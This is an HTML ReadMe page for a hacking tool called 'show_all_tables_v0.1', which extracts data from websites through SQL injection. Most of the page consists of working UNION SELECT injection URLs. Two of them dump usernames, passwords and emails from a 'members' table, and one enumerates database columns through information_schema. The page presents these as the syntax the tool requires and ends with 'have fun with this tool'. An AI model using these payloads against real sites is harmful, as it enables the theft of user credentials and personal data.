<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
     "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>.::show_all_tables_v0.1::.</title>
</head>
<body style="background-color:black; color:greenyellow">
<center>
<h1 style="color:gold;">.::show_all_tables_v0.1::.</h1>
<h3 style="color:gold;">_by_s0mbra_</h3>
<h2 style="color:gold;">-=ReadMe=-</h2>
<p>This tool is for extracting informations from a sql-injection...and write them to "output.txt"<br />
<h2>Syntax for URL</h2>
<pre style="background-color:#333333; color:greenyellow">http://www.irgendeineseite.com/show.php?id=-9+UNION+all+SELECT+1,concat(username,0x3a,password,0x3a,email),3,4+from+members+limit+0,1--</pre>
<p>or with SQL > 5:
<pre style="background-color:#333333; color:greenyellow">http://www.irgendeineseite.com/index.php?id=00+union+all+select+1,2,3,4,concat(column_name),6,7,8+from+information_schema.columns+limit+0,1--</pre><br />
URL must contain: <b style="color:green;">concat()</b> und <b style="color:green;">limit+0,1</b> vorhanden sein...</p>
<pre style="background-color:#333333; color:greenyellow">http://www.seite.de/index.php?sid=-42+UNION+all+SELECT+1,<b style="color:green;">concat(</b>username,0x3a,password,0x3a,email<b style="color:green;">)</b>,3,4+from+members+<b style="color:green;">limit+0,1</b>--</pre><br />
<p>have fun with this tool :P</p>
</body>
</html>
